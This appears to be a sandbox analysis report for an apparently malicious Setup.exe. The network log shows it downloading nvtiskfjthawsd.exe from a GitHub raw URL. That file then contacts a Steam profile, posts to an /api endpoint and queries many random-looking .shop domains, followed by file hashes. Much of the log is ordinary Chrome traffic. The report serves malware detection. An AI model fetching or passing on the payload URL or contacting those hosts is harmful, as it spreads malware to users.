                                    GET https://github.com/arizaseeen/ariiiza/raw/refs/heads/main/nvtiskfjthawsd.exe

                                    HTTP Response

                                    302
                                  • 185.199.111.133:443
                                    https://raw.githubusercontent.com/arizaseeen/ariiiza/refs/heads/main/nvtiskfjthawsd.exe
                                    tls, http
                                    Setup.exe
                                    22.7kB
                                    1.3MB
                                    484
                                    960

                                    HTTP Request

                                    GET https://raw.githubusercontent.com/arizaseeen/ariiiza/refs/heads/main/nvtiskfjthawsd.exe

                                    HTTP Response

                                    200
                                  • 23.67.133.187:443
                                    https://steamcommunity.com/profiles/76561199724331900
                                    tls, http
                                    nvtiskfjthawsd.exe
                                    1.5kB
                                    43.1kB
                                    21
                                    36

                                    HTTP Request

                                    GET https://steamcommunity.com/profiles/76561199724331900

                                    HTTP Response

                                    200
                                  • 104.21.14.233:443
                                    https://misha-lomonosov.com/api
                                    tls, http
                                    nvtiskfjthawsd.exe
                                    1.0kB
                                    4.9kB
                                    9
                                    9

                                    HTTP Request

                                    POST https://misha-lomonosov.com/api

                                    HTTP Response

                                    200
                                  • 8.8.8.8:53
                                    youtu.be
                                    dns
                                    chrome.exe
                                    108 B
                                    70 B
                                    2
                                    1

                                    DNS Request

                                    youtu.be

                                    DNS Request

                                    youtu.be

                                    DNS Response

                                    142.250.180.14

                                  • 8.8.8.8:53
                                    www.youtube.com
                                    dns
                                    chrome.exe
                                    61 B
                                    351 B
                                    1
                                    1

                                    DNS Request

                                    www.youtube.com

                                    DNS Response

                                    172.217.169.78
                                    216.58.212.206
                                    216.58.201.110
                                    172.217.16.238
                                    142.250.200.14
                                    142.250.187.238
                                    172.217.169.46
                                    142.250.200.46
                                    142.250.179.238
                                    142.250.180.14
                                    216.58.213.14
                                    142.250.178.14
                                    216.58.204.78
                                    216.58.212.238
                                    172.217.169.14
                                    142.250.187.206

                                  • 8.8.8.8:53
                                    i.ytimg.com
                                    dns
                                    chrome.exe
                                    57 B
                                    297 B
                                    1
                                    1

                                    DNS Request

                                    i.ytimg.com

                                    DNS Response

                                    216.58.201.118
                                    172.217.169.86
                                    142.250.180.22
                                    216.58.204.86
                                    216.58.212.214
                                    172.217.169.22
                                    216.58.213.22
                                    142.250.200.22
                                    142.250.178.22
                                    142.250.187.246
                                    172.217.169.54
                                    142.250.200.54
                                    142.250.187.214
                                    172.217.16.246
                                    142.250.179.246

                                  • 172.217.169.78:443
                                    www.youtube.com
                                    https
                                    chrome.exe
                                    66.0kB
                                    2.1MB
                                    414
                                    1752
                                  • 8.8.8.8:53
                                    rr2---sn-5hnekn7s.googlevideo.com
                                    dns
                                    chrome.exe
                                    79 B
                                    125 B
                                    1
                                    1

                                    DNS Request

                                    rr2---sn-5hnekn7s.googlevideo.com

                                    DNS Response

                                    74.125.100.39

                                  • 8.8.8.8:53
                                    10.213.58.216.in-addr.arpa
                                    dns
                                    72 B
                                    141 B
                                    1
                                    1

                                    DNS Request

                                    10.213.58.216.in-addr.arpa

                                  • 8.8.8.8:53
                                    14.180.250.142.in-addr.arpa
                                    dns
                                    73 B
                                    112 B
                                    1
                                    1

                                    DNS Request

                                    14.180.250.142.in-addr.arpa

                                  • 8.8.8.8:53
                                    78.169.217.172.in-addr.arpa
                                    dns
                                    73 B
                                    112 B
                                    1
                                    1

                                    DNS Request

                                    78.169.217.172.in-addr.arpa

                                  • 8.8.8.8:53
                                    jnn-pa.googleapis.com
                                    dns
                                    chrome.exe
                                    67 B
                                    291 B
                                    1
                                    1

                                    DNS Request

                                    jnn-pa.googleapis.com

                                    DNS Response

                                    142.250.178.10
                                    172.217.169.42
                                    142.250.187.234
                                    216.58.213.10
                                    142.250.187.202
                                    216.58.212.234
                                    142.250.200.10
                                    142.250.200.42
                                    216.58.201.106
                                    216.58.204.74
                                    172.217.169.74
                                    142.250.180.10
                                    172.217.16.234
                                    142.250.179.234

                                  • 8.8.8.8:53
                                    accounts.google.com
                                    dns
                                    chrome.exe
                                    65 B
                                    81 B
                                    1
                                    1

                                    DNS Request

                                    accounts.google.com

                                    DNS Response

                                    142.251.173.84

                                  • 142.250.178.10:443
                                    jnn-pa.googleapis.com
                                    https
                                    chrome.exe
                                    9.6kB
                                    56.9kB
                                    55
                                    75
                                  • 8.8.8.8:53
                                    play.google.com
                                    dns
                                    chrome.exe
                                    61 B
                                    77 B
                                    1
                                    1

                                    DNS Request

                                    play.google.com

                                    DNS Response

                                    142.250.179.238

                                  • 8.8.8.8:53
                                    74.204.58.216.in-addr.arpa
                                    dns
                                    72 B
                                    171 B
                                    1
                                    1

                                    DNS Request

                                    74.204.58.216.in-addr.arpa

                                  • 8.8.8.8:53
                                    39.100.125.74.in-addr.arpa
                                    dns
                                    72 B
                                    110 B
                                    1
                                    1

                                    DNS Request

                                    39.100.125.74.in-addr.arpa

                                  • 8.8.8.8:53
                                    195.187.250.142.in-addr.arpa
                                    dns
                                    74 B
                                    112 B
                                    1
                                    1

                                    DNS Request

                                    195.187.250.142.in-addr.arpa

                                  • 8.8.8.8:53
                                    104.219.191.52.in-addr.arpa
                                    dns
                                    73 B
                                    147 B
                                    1
                                    1

                                    DNS Request

                                    104.219.191.52.in-addr.arpa

                                  • 8.8.8.8:53
                                    10.178.250.142.in-addr.arpa
                                    dns
                                    73 B
                                    112 B
                                    1
                                    1

                                    DNS Request

                                    10.178.250.142.in-addr.arpa

                                  • 8.8.8.8:53
                                    227.187.250.142.in-addr.arpa
                                    dns
                                    74 B
                                    112 B
                                    1
                                    1

                                    DNS Request

                                    227.187.250.142.in-addr.arpa

                                  • 8.8.8.8:53
                                    118.201.58.216.in-addr.arpa
                                    dns
                                    73 B
                                    173 B
                                    1
                                    1

                                    DNS Request

                                    118.201.58.216.in-addr.arpa

                                  • 142.250.179.238:443
                                    play.google.com
                                    https
                                    chrome.exe
                                    15.4kB
                                    13.1kB
                                    49
                                    48
                                  • 142.251.173.84:443
                                    accounts.google.com
                                    https
                                    chrome.exe
                                    5.2kB
                                    13.5kB
                                    19
                                    22
                                  • 8.8.8.8:53
                                    www.google.com
                                    dns
                                    chrome.exe
                                    60 B
                                    76 B
                                    1
                                    1

                                    DNS Request

                                    www.google.com

                                    DNS Response

                                    142.250.187.196

                                  • 8.8.8.8:53
                                    content-autofill.googleapis.com
                                    dns
                                    chrome.exe
                                    77 B
                                    301 B
                                    1
                                    1

                                    DNS Request

                                    content-autofill.googleapis.com

                                    DNS Response

                                    142.250.187.234
                                    172.217.169.42
                                    142.250.200.10
                                    216.58.212.202
                                    172.217.16.234
                                    142.250.179.234
                                    142.250.200.42
                                    216.58.201.106
                                    142.250.180.10
                                    142.250.178.10
                                    172.217.169.74
                                    216.58.204.74
                                    216.58.213.10
                                    142.250.187.202

                                  • 8.8.8.8:53
                                    84.173.251.142.in-addr.arpa
                                    dns
                                    73 B
                                    106 B
                                    1
                                    1

                                    DNS Request

                                    84.173.251.142.in-addr.arpa

                                  • 8.8.8.8:53
                                    196.187.250.142.in-addr.arpa
                                    dns
                                    74 B
                                    112 B
                                    1
                                    1

                                    DNS Request

                                    196.187.250.142.in-addr.arpa

                                  • 8.8.8.8:53
                                    yt3.ggpht.com
                                    dns
                                    chrome.exe
                                    59 B
                                    120 B
                                    1
                                    1

                                    DNS Request

                                    yt3.ggpht.com

                                    DNS Response

                                    172.217.16.225

                                  • 216.58.201.118:443
                                    i.ytimg.com
                                    https
                                    chrome.exe
                                    13.4kB
                                    108.5kB
                                    101
                                    126
                                  • 8.8.8.8:53
                                    225.16.217.172.in-addr.arpa
                                    dns
                                    73 B
                                    140 B
                                    1
                                    1

                                    DNS Request

                                    225.16.217.172.in-addr.arpa

                                  • 142.250.179.238:443
                                    play.google.com
                                    https
                                    chrome.exe
                                    2.9kB
                                    7.9kB
                                    6
                                    9
                                  • 8.8.8.8:53
                                    youtube.com
                                    dns
                                    chrome.exe
                                    57 B
                                    73 B
                                    1
                                    1

                                    DNS Request

                                    youtube.com

                                    DNS Response

                                    216.58.213.14

                                  • 8.8.8.8:53
                                    69.31.126.40.in-addr.arpa
                                    dns
                                    71 B
                                    157 B
                                    1
                                    1

                                    DNS Request

                                    69.31.126.40.in-addr.arpa

                                  • 8.8.8.8:53
                                    95.221.229.192.in-addr.arpa
                                    dns
                                    73 B
                                    144 B
                                    1
                                    1

                                    DNS Request

                                    95.221.229.192.in-addr.arpa

                                  • 224.0.0.251:5353
                                    chrome.exe
                                    204 B
                                    3
                                  • 172.217.16.225:443
                                    yt3.ggpht.com
                                    https
                                    chrome.exe
                                    3.0kB
                                    6.1kB
                                    6
                                    7
                                  • 8.8.8.8:53
                                    17.160.190.20.in-addr.arpa
                                    dns
                                    72 B
                                    158 B
                                    1
                                    1

                                    DNS Request

                                    17.160.190.20.in-addr.arpa

                                  • 8.8.8.8:53
                                    consent.youtube.com
                                    dns
                                    chrome.exe
                                    130 B
                                    81 B
                                    2
                                    1

                                    DNS Request

                                    consent.youtube.com

                                    DNS Request

                                    consent.youtube.com

                                    DNS Response

                                    142.250.200.46

                                  • 74.125.100.39:443
                                    rr2---sn-5hnekn7s.googlevideo.com
                                    https
                                    chrome.exe
                                    3.0kB
                                    5.9kB
                                    6
                                    7
                                  • 8.8.8.8:53
                                    static.doubleclick.net
                                    dns
                                    chrome.exe
                                    68 B
                                    84 B
                                    1
                                    1

                                    DNS Request

                                    static.doubleclick.net

                                    DNS Response

                                    142.250.187.230

                                  • 8.8.8.8:53
                                    230.187.250.142.in-addr.arpa
                                    dns
                                    74 B
                                    112 B
                                    1
                                    1

                                    DNS Request

                                    230.187.250.142.in-addr.arpa

                                  • 8.8.8.8:53
                                    googleads.g.doubleclick.net
                                    dns
                                    chrome.exe
                                    73 B
                                    89 B
                                    1
                                    1

                                    DNS Request

                                    googleads.g.doubleclick.net

                                    DNS Response

                                    216.58.201.98

                                  • 216.58.201.98:443
                                    googleads.g.doubleclick.net
                                    https
                                    chrome.exe
                                    6.7kB
                                    8.0kB
                                    17
                                    14
                                  • 8.8.8.8:53
                                    98.201.58.216.in-addr.arpa
                                    dns
                                    72 B
                                    169 B
                                    1
                                    1

                                    DNS Request

                                    98.201.58.216.in-addr.arpa

                                  • 216.58.213.14:443
                                    youtube.com
                                    https
                                    chrome.exe
                                    2.3kB
                                    9.7kB
                                    10
                                    11
                                  • 8.8.8.8:53
                                    241.150.49.20.in-addr.arpa
                                    dns
                                    72 B
                                    158 B
                                    1
                                    1

                                    DNS Request

                                    241.150.49.20.in-addr.arpa

                                  • 172.217.169.78:443
                                    www.youtube.com
                                    https
                                    chrome.exe
                                    5.9kB
                                    129.2kB
                                    28
                                    111
                                  • 172.217.169.78:443
                                    www.youtube.com
                                    https
                                    chrome.exe
                                    18.3kB
                                    40.9kB
                                    42
                                    56
                                  • 8.8.8.8:53
                                    50.23.12.20.in-addr.arpa
                                    dns
                                    70 B
                                    156 B
                                    1
                                    1

                                    DNS Request

                                    50.23.12.20.in-addr.arpa

                                  • 8.8.8.8:53
                                    209.205.72.20.in-addr.arpa
                                    dns
                                    72 B
                                    158 B
                                    1
                                    1

                                    DNS Request

                                    209.205.72.20.in-addr.arpa

                                  • 172.217.16.225:443
                                    yt3.ggpht.com
                                    https
                                    chrome.exe
                                    3.9kB
                                    5.1kB
                                    11
                                    10
                                  • 8.8.8.8:53
                                    drive.google.com
                                    dns
                                    chrome.exe
                                    124 B
                                    156 B
                                    2
                                    2

                                    DNS Request

                                    drive.google.com

                                    DNS Request

                                    drive.google.com

                                    DNS Response

                                    172.217.169.78

                                    DNS Response

                                    172.217.169.78

                                  • 8.8.8.8:53
                                    ogads-pa.googleapis.com
                                    dns
                                    chrome.exe
                                    69 B
                                    309 B
                                    1
                                    1

                                    DNS Request

                                    ogads-pa.googleapis.com

                                    DNS Response

                                    216.58.213.10
                                    142.250.178.10
                                    172.217.169.74
                                    172.217.16.234
                                    172.217.169.10
                                    216.58.212.202
                                    142.250.200.10
                                    142.250.200.42
                                    142.250.187.234
                                    216.58.204.74
                                    216.58.201.106
                                    142.250.187.202
                                    142.250.179.234
                                    142.250.180.10
                                    172.217.169.42

                                  • 8.8.8.8:53
                                    apis.google.com
                                    dns
                                    chrome.exe
                                    61 B
                                    98 B
                                    1
                                    1

                                    DNS Request

                                    apis.google.com

                                    DNS Response

                                    142.250.178.14

                                  • 172.217.169.78:443
                                    drive.google.com
                                    https
                                    chrome.exe
                                    5.2kB
                                    9.8kB
                                    16
                                    20
                                  • 8.8.8.8:53
                                    youtube.googleapis.com
                                    dns
                                    chrome.exe
                                    136 B
                                    648 B
                                    2
                                    2

                                    DNS Request

                                    youtube.googleapis.com

                                    DNS Response

                                    216.58.204.74
                                    172.217.169.10
                                    142.250.187.234
                                    142.250.200.10
                                    216.58.212.234
                                    142.250.187.202
                                    172.217.16.234
                                    216.58.201.106
                                    216.58.213.10
                                    172.217.169.74
                                    142.250.179.234
                                    172.217.169.42
                                    142.250.178.10
                                    142.250.200.42
                                    142.250.180.10
                                    216.58.212.202

                                    DNS Request

                                    youtube.googleapis.com

                                    DNS Response

                                    142.250.187.202
                                    142.250.200.10
                                    216.58.204.74
                                    172.217.169.42
                                    172.217.169.74
                                    142.250.180.10
                                    216.58.213.10
                                    142.250.187.234
                                    172.217.169.10
                                    142.250.179.234
                                    216.58.201.106
                                    216.58.212.234
                                    142.250.200.42
                                    142.250.178.10
                                    172.217.16.234
                                    216.58.212.202

                                  • 8.8.8.8:53
                                    ssl.gstatic.com
                                    dns
                                    chrome.exe
                                    61 B
                                    77 B
                                    1
                                    1

                                    DNS Request

                                    ssl.gstatic.com

                                    DNS Response

                                    142.250.200.3

                                  • 8.8.8.8:53
                                    blobcomments-pa.clients6.google.com
                                    dns
                                    chrome.exe
                                    81 B
                                    97 B
                                    1
                                    1

                                    DNS Request

                                    blobcomments-pa.clients6.google.com

                                    DNS Response

                                    142.250.200.10

                                  • 8.8.8.8:53
                                    content.googleapis.com
                                    dns
                                    chrome.exe
                                    68 B
                                    308 B
                                    1
                                    1

                                    DNS Request

                                    content.googleapis.com

                                    DNS Response

                                    142.250.187.202
                                    142.250.200.42
                                    172.217.169.42
                                    142.250.200.10
                                    172.217.169.74
                                    216.58.201.106
                                    172.217.16.234
                                    216.58.204.74
                                    142.250.187.234
                                    216.58.212.234
                                    216.58.213.10
                                    142.250.180.10
                                    172.217.169.10
                                    142.250.179.234
                                    142.250.178.10

                                  • 142.250.179.238:443
                                    play.google.com
                                    https
                                    chrome.exe
                                    43.3kB
                                    13.3kB
                                    60
                                    55
                                  • 142.250.200.3:443
                                    ssl.gstatic.com
                                    https
                                    chrome.exe
                                    3.8kB
                                    8.1kB
                                    11
                                    12
                                  • 142.251.173.84:443
                                    accounts.google.com
                                    https
                                    chrome.exe
                                    1.6kB
                                    7.1kB
                                    4
                                    8
                                  • 8.8.8.8:53
                                    www.google.com
                                    dns
                                    chrome.exe
                                    60 B
                                    76 B
                                    1
                                    1

                                    DNS Request

                                    www.google.com

                                    DNS Response

                                    142.250.187.196

                                  • 142.250.200.10:443
                                    content.googleapis.com
                                    https
                                    chrome.exe
                                    1.6kB
                                    7.0kB
                                    4
                                    8
                                  • 142.250.178.14:443
                                    apis.google.com
                                    https
                                    chrome.exe
                                    1.7kB
                                    7.1kB
                                    7
                                    8
                                  • 142.250.187.202:443
                                    content.googleapis.com
                                    https
                                    chrome.exe
                                    1.6kB
                                    6.5kB
                                    4
                                    8
                                  • 8.8.8.8:53
                                    14.178.250.142.in-addr.arpa
                                    dns
                                    73 B
                                    112 B
                                    1
                                    1

                                    DNS Request

                                    14.178.250.142.in-addr.arpa

                                  • 8.8.8.8:53
                                    202.187.250.142.in-addr.arpa
                                    dns
                                    74 B
                                    113 B
                                    1
                                    1

                                    DNS Request

                                    202.187.250.142.in-addr.arpa

                                  • 8.8.8.8:53
                                    3.200.250.142.in-addr.arpa
                                    dns
                                    72 B
                                    110 B
                                    1
                                    1

                                    DNS Request

                                    3.200.250.142.in-addr.arpa

                                  • 8.8.8.8:53
                                    10.200.250.142.in-addr.arpa
                                    dns
                                    146 B
                                    224 B
                                    2
                                    2

                                    DNS Request

                                    10.200.250.142.in-addr.arpa

                                    DNS Request

                                    10.200.250.142.in-addr.arpa

                                  • 8.8.8.8:53
                                    peoplestackwebexperiments-pa.clients6.google.com
                                    dns
                                    chrome.exe
                                    94 B
                                    110 B
                                    1
                                    1

                                    DNS Request

                                    peoplestackwebexperiments-pa.clients6.google.com

                                    DNS Response

                                    142.250.180.10

                                  • 142.250.180.10:443
                                    peoplestackwebexperiments-pa.clients6.google.com
                                    https
                                    chrome.exe
                                    1.6kB
                                    7.1kB
                                    4
                                    8
                                  • 8.8.8.8:53
                                    10.180.250.142.in-addr.arpa
                                    dns
                                    73 B
                                    112 B
                                    1
                                    1

                                    DNS Request

                                    10.180.250.142.in-addr.arpa

                                  • 8.8.8.8:53
                                    drive.usercontent.google.com
                                    dns
                                    chrome.exe
                                    74 B
                                    90 B
                                    1
                                    1

                                    DNS Request

                                    drive.usercontent.google.com

                                    DNS Response

                                    216.58.212.193

                                  • 216.58.212.193:443
                                    drive.usercontent.google.com
                                    https
                                    chrome.exe
                                    39.0kB
                                    3.8MB
                                    484
                                    2952
                                  • 8.8.8.8:53
                                    193.212.58.216.in-addr.arpa
                                    dns
                                    73 B
                                    171 B
                                    1
                                    1

                                    DNS Request

                                    193.212.58.216.in-addr.arpa

                                  • 216.58.212.193:443
                                    drive.usercontent.google.com
                                    https
                                    chrome.exe
                                    1.3MB
                                    148.9MB
                                    15382
                                    117467
                                  • 8.8.8.8:53
                                    107.27.33.23.in-addr.arpa
                                    dns
                                    71 B
                                    135 B
                                    1
                                    1

                                    DNS Request

                                    107.27.33.23.in-addr.arpa

                                  • 8.8.8.8:53
                                    beacons.gcp.gvt2.com
                                    dns
                                    chrome.exe
                                    132 B
                                    224 B
                                    2
                                    2

                                    DNS Request

                                    beacons.gcp.gvt2.com

                                    DNS Request

                                    beacons.gcp.gvt2.com

                                    DNS Response

                                    74.125.206.94

                                    DNS Response

                                    74.125.206.94

                                  • 142.251.173.84:443
                                    accounts.google.com
                                    https
                                    chrome.exe
                                    3.4kB
                                    7.9kB
                                    9
                                    11
                                  • 8.8.8.8:53
                                    94.206.125.74.in-addr.arpa
                                    dns
                                    72 B
                                    105 B
                                    1
                                    1

                                    DNS Request

                                    94.206.125.74.in-addr.arpa

                                  • 142.250.179.238:443
                                    play.google.com
                                    https
                                    chrome.exe
                                    3.2kB
                                    6.7kB
                                    8
                                    8
                                  • 8.8.8.8:53
                                    22.236.111.52.in-addr.arpa
                                    dns
                                    144 B
                                    158 B
                                    2
                                    1

                                    DNS Request

                                    22.236.111.52.in-addr.arpa

                                    DNS Request

                                    22.236.111.52.in-addr.arpa

                                  • 8.8.8.8:53
                                    172.214.232.199.in-addr.arpa
                                    dns
                                    148 B
                                    128 B
                                    2
                                    1

                                    DNS Request

                                    172.214.232.199.in-addr.arpa

                                    DNS Request

                                    172.214.232.199.in-addr.arpa

                                  • 8.8.8.8:53
                                    github.com
                                    dns
                                    Setup.exe
                                    112 B
                                    144 B
                                    2
                                    2

                                    DNS Request

                                    github.com

                                    DNS Request

                                    github.com

                                    DNS Response

                                    20.26.156.215

                                    DNS Response

                                    20.26.156.215

                                  • 8.8.8.8:53
                                    215.156.26.20.in-addr.arpa
                                    dns
                                    144 B
                                    316 B
                                    2
                                    2

                                    DNS Request

                                    215.156.26.20.in-addr.arpa

                                    DNS Request

                                    215.156.26.20.in-addr.arpa

                                  • 8.8.8.8:53
                                    raw.githubusercontent.com
                                    dns
                                    Setup.exe
                                    142 B
                                    135 B
                                    2
                                    1

                                    DNS Request

                                    raw.githubusercontent.com

                                    DNS Request

                                    raw.githubusercontent.com

                                    DNS Response

                                    185.199.111.133
                                    185.199.109.133
                                    185.199.110.133
                                    185.199.108.133

                                  • 8.8.8.8:53
                                    133.111.199.185.in-addr.arpa
                                    dns
                                    222 B
                                    118 B
                                    3
                                    1

                                    DNS Request

                                    133.111.199.185.in-addr.arpa

                                    DNS Request

                                    133.111.199.185.in-addr.arpa

                                    DNS Request

                                    133.111.199.185.in-addr.arpa

                                  • 8.8.8.8:53
                                    cureprouderio.click
                                    dns
                                    nvtiskfjthawsd.exe
                                    130 B
                                    260 B
                                    2
                                    2

                                    DNS Request

                                    cureprouderio.click

                                    DNS Request

                                    cureprouderio.click

                                  • 8.8.8.8:53
                                    nearycrepso.shop
                                    dns
                                    nvtiskfjthawsd.exe
                                    62 B
                                    119 B
                                    1
                                    1

                                    DNS Request

                                    nearycrepso.shop

                                  • 8.8.8.8:53
                                    abruptyopsn.shop
                                    dns
                                    nvtiskfjthawsd.exe
                                    62 B
                                    119 B
                                    1
                                    1

                                    DNS Request

                                    abruptyopsn.shop

                                  • 8.8.8.8:53
                                    wholersorie.shop
                                    dns
                                    nvtiskfjthawsd.exe
                                    62 B
                                    119 B
                                    1
                                    1

                                    DNS Request

                                    wholersorie.shop

                                  • 8.8.8.8:53
                                    framekgirus.shop
                                    dns
                                    nvtiskfjthawsd.exe
                                    124 B
                                    238 B
                                    2
                                    2

                                    DNS Request

                                    framekgirus.shop

                                    DNS Request

                                    framekgirus.shop

                                  • 8.8.8.8:53
                                    tirepublicerj.shop
                                    dns
                                    nvtiskfjthawsd.exe
                                    128 B
                                    242 B
                                    2
                                    2

                                    DNS Request

                                    tirepublicerj.shop

                                    DNS Request

                                    tirepublicerj.shop

                                  • 8.8.8.8:53
                                    noisycuttej.shop
                                    dns
                                    nvtiskfjthawsd.exe
                                    124 B
                                    238 B
                                    2
                                    2

                                    DNS Request

                                    noisycuttej.shop

                                    DNS Request

                                    noisycuttej.shop

                                  • 8.8.8.8:53
                                    rabidcowse.shop
                                    dns
                                    nvtiskfjthawsd.exe
                                    122 B
                                    236 B
                                    2
                                    2

                                    DNS Request

                                    rabidcowse.shop

                                    DNS Request

                                    rabidcowse.shop

                                  • 8.8.8.8:53
                                    cloudewahsj.shop
                                    dns
                                    nvtiskfjthawsd.exe
                                    124 B
                                    238 B
                                    2
                                    2

                                    DNS Request

                                    cloudewahsj.shop

                                    DNS Request

                                    cloudewahsj.shop

                                  • 8.8.8.8:53
                                    steamcommunity.com
                                    dns
                                    nvtiskfjthawsd.exe
                                    128 B
                                    160 B
                                    2
                                    2

                                    DNS Request

                                    steamcommunity.com

                                    DNS Request

                                    steamcommunity.com

                                    DNS Response

                                    23.67.133.187

                                    DNS Response

                                    23.67.133.187

                                  • 8.8.8.8:53
                                    misha-lomonosov.com
                                    dns
                                    nvtiskfjthawsd.exe
                                    65 B
                                    97 B
                                    1
                                    1

                                    DNS Request

                                    misha-lomonosov.com

                                    DNS Response

                                    104.21.14.233
                                    172.67.160.193

                                  • 8.8.8.8:53
                                    187.133.67.23.in-addr.arpa
                                    dns
                                    72 B
                                    137 B
                                    1
                                    1

                                    DNS Request

                                    187.133.67.23.in-addr.arpa

                                  • 8.8.8.8:53
                                    233.14.21.104.in-addr.arpa
                                    dns
                                    144 B
                                    268 B
                                    2
                                    2

                                    DNS Request

                                    233.14.21.104.in-addr.arpa

                                    DNS Request

                                    233.14.21.104.in-addr.arpa

                                  • 8.8.8.8:53
                                    cureprouderio.click
                                    dns
                                    nvtiskfjthawsd.exe
                                    130 B
                                    260 B
                                    2
                                    2

                                    DNS Request

                                    cureprouderio.click

                                    DNS Request

                                    cureprouderio.click

                                  • 8.8.8.8:53
                                    nearycrepso.shop
                                    dns
                                    nvtiskfjthawsd.exe
                                    124 B
                                    238 B
                                    2
                                    2

                                    DNS Request

                                    nearycrepso.shop

                                    DNS Request

                                    nearycrepso.shop

                                  • 8.8.8.8:53
                                    abruptyopsn.shop
                                    dns
                                    nvtiskfjthawsd.exe
                                    124 B
                                    238 B
                                    2
                                    2

                                    DNS Request

                                    abruptyopsn.shop

                                    DNS Request

                                    abruptyopsn.shop

                                  • 8.8.8.8:53
                                    wholersorie.shop
                                    dns
                                    nvtiskfjthawsd.exe
                                    124 B
                                    238 B
                                    2
                                    2

                                    DNS Request

                                    wholersorie.shop

                                    DNS Request

                                    wholersorie.shop

                                  • 8.8.8.8:53
                                    framekgirus.shop
                                    dns
                                    nvtiskfjthawsd.exe
                                    124 B
                                    238 B
                                    2
                                    2

                                    DNS Request

                                    framekgirus.shop

                                    DNS Request

                                    framekgirus.shop

                                  • 8.8.8.8:53
                                    tirepublicerj.shop
                                    dns
                                    nvtiskfjthawsd.exe
                                    128 B
                                    242 B
                                    2
                                    2

                                    DNS Request

                                    tirepublicerj.shop

                                    DNS Request

                                    tirepublicerj.shop

                                  • 8.8.8.8:53
                                    noisycuttej.shop
                                    dns
                                    nvtiskfjthawsd.exe
                                    124 B
                                    238 B
                                    2
                                    2

                                    DNS Request

                                    noisycuttej.shop

                                    DNS Request

                                    noisycuttej.shop

                                  • 8.8.8.8:53
                                    rabidcowse.shop
                                    dns
                                    nvtiskfjthawsd.exe
                                    122 B
                                    236 B
                                    2
                                    2

                                    DNS Request

                                    rabidcowse.shop

                                    DNS Request

                                    rabidcowse.shop

                                  • 8.8.8.8:53
                                    cloudewahsj.shop
                                    dns
                                    nvtiskfjthawsd.exe
                                    124 B
                                    238 B
                                    2
                                    2

                                    DNS Request

                                    cloudewahsj.shop

                                    DNS Request

                                    cloudewahsj.shop

                                  • 8.8.8.8:53
                                    steamcommunity.com
                                    dns
                                    nvtiskfjthawsd.exe
                                    128 B
                                    160 B
                                    2
                                    2

                                    DNS Request

                                    steamcommunity.com

                                    DNS Request

                                    steamcommunity.com

                                    DNS Response

                                    23.67.133.187

                                    DNS Response

                                    23.67.133.187

                                  • 8.8.8.8:53
                                    cureprouderio.click
                                    dns
                                    nvtiskfjthawsd.exe
                                    130 B
                                    260 B
                                    2
                                    2

                                    DNS Request

                                    cureprouderio.click

                                    DNS Request

                                    cureprouderio.click

                                  • 8.8.8.8:53
                                    nearycrepso.shop
                                    dns
                                    nvtiskfjthawsd.exe
                                    124 B
                                    238 B
                                    2
                                    2

                                    DNS Request

                                    nearycrepso.shop

                                    DNS Request

                                    nearycrepso.shop

                                  • 8.8.8.8:53
                                    abruptyopsn.shop
                                    dns
                                    nvtiskfjthawsd.exe
                                    124 B
                                    238 B
                                    2
                                    2

                                    DNS Request

                                    abruptyopsn.shop

                                    DNS Request

                                    abruptyopsn.shop

                                  • 8.8.8.8:53
                                    wholersorie.shop
                                    dns
                                    nvtiskfjthawsd.exe
                                    124 B
                                    238 B
                                    2
                                    2

                                    DNS Request

                                    wholersorie.shop

                                    DNS Request

                                    wholersorie.shop

                                  • 8.8.8.8:53
                                    framekgirus.shop
                                    dns
                                    nvtiskfjthawsd.exe
                                    124 B
                                    238 B
                                    2
                                    2

                                    DNS Request

                                    framekgirus.shop

                                    DNS Request

                                    framekgirus.shop

                                  • 8.8.8.8:53
                                    tirepublicerj.shop
                                    dns
                                    nvtiskfjthawsd.exe
                                    128 B
                                    242 B
                                    2
                                    2

                                    DNS Request

                                    tirepublicerj.shop

                                    DNS Request

                                    tirepublicerj.shop

                                  • 8.8.8.8:53
                                    noisycuttej.shop
                                    dns
                                    nvtiskfjthawsd.exe
                                    124 B
                                    238 B
                                    2
                                    2

                                    DNS Request

                                    noisycuttej.shop

                                    DNS Request

                                    noisycuttej.shop

                                  • 8.8.8.8:53
                                    rabidcowse.shop
                                    dns
                                    nvtiskfjthawsd.exe
                                    122 B
                                    236 B
                                    2
                                    2

                                    DNS Request

                                    rabidcowse.shop

                                    DNS Request

                                    rabidcowse.shop

                                  • 8.8.8.8:53
                                    cloudewahsj.shop
                                    dns
                                    nvtiskfjthawsd.exe
                                    124 B
                                    238 B
                                    2
                                    2

                                    DNS Request

                                    cloudewahsj.shop

                                    DNS Request

                                    cloudewahsj.shop

                                  MITRE ATT&CK Enterprise v15

                                  Replay Monitor

                                  Loading Replay Monitor...

                                  Downloads

                                  • C:\ODYBTnEZ\nvtiskfjthawsd.exe

                                    Filesize

                                    1.2MB

                                    MD5

                                    400a5fa50c11c7e7982b90341814ffb1

                                    SHA1

                                    b951758659ab1a7185d92bc4fd428abcb064e3d3

                                    SHA256

                                    fcc3476afef5cac8024038d9b1470f771d5516507040009646f5d331879c26af

                                    SHA512

                                    1592c9f22ab51b88078e807774b3daa7ecf2eafb1aff44dcafb602fc0449bea9e36102858c7175c844c45518222ce6dbffa2840b9e9a3eb733bc4112115c2607

                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

                                    Filesize

                                    649B

                                    MD5

                                    faf18c7ee21cd23546903364c25cffd3

                                    SHA1

                                    9b092dd2c15de06a2e3e65d00195a9e42000eca1

                                    SHA256

                                    9e71149287c2bb7882e9133ec51f59618c8af016da3efb8e1ff8e98d457e9326

                                    SHA512

                                    b35ad1660887dd2e49be6373201d429e49c097b1fea5a95636f7bb1c32f03121ef6a7fd6f5da5d9b8916c61a389eab069dc48849eed8ced81323205265108ca0

                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000009

                                    Filesize

                                    242KB

                                    MD5

                                    afdfdba750d77a65fedd390d20a727bd

                                    SHA1

                                    b7948f70661731c45fd41e8be62be134865fd299

                                    SHA256

                                    5d23ab16d09cc8960ceab365597dbb3ae198b10ff61adb3ef2131a63fd8a0075

                                    SHA512

                                    6a7469772bd4815f5836864cb21bbf3d4a3185a7c88ab927107252e4403a90c90ba113dfae87734ff3e3edf8e2320b684fdbf463da2be1cfe816c73d4272ed92

                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000c

                                    Filesize

                                    34KB

                                    MD5

                                    796cde84f96aeb0e7938a6449c5df98c

                                    SHA1

                                    bcfe2832173b772cf4ac08aa90a45550dd54f96d

